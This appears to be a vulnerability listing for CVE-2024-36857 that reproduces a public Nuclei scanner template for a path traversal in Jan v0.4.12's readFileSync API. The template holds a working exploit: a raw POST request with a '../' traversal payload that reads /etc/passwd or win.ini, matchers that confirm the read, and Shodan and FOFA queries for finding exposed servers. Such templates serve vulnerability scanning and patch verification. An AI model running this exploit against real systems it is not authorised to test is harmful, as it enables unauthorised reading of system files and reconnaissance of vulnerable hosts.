漏洞描述
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
CVE-2024-36857: Jan v0.4.12 'readFileSync' - Path Traversal
PoC代码[已公开]
id: CVE-2024-36857
info:
name: Jan v0.4.12 'readFileSync' - Path Traversal
author: Yusuf Amr
severity: high
description: |
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
reference:
- https://www.wiz.io/vulnerability-database/cve/cve-2024-36857
- https://github.com/HackAllSec/CVEs/tree/main/Jan%20AFR%20vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-36857
epss-score: 0.19463
epss-percentile: 0.95196
cpe: cpe:2.3:a:homebrew:jan:0.4.12:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: http.favicon.hash:"-165268926"
fofa-query: icon_hash="-165268926"
vendor: homebrew
product: jan
tags: cve,cve2024,jan,lfi,vkev
http:
- raw:
- |
POST /v1/app/readFileSync HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain;charset=UTF-8
["file:/../../../../../..{{path}}","utf-8"]
payloads:
path:
- '/etc/passwd'
- '/Windows/win.ini'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 490a0046304402205a340aad5e948d2d582bbd634ce34df207fe21ac9f2bb74293ad0014089eb07c0220412d0d9ca5f1f8835697b30dc4fe7d613f991da3543998a4cdc9b235fc2f496d:922c64590222798bb761d5b6d8e72950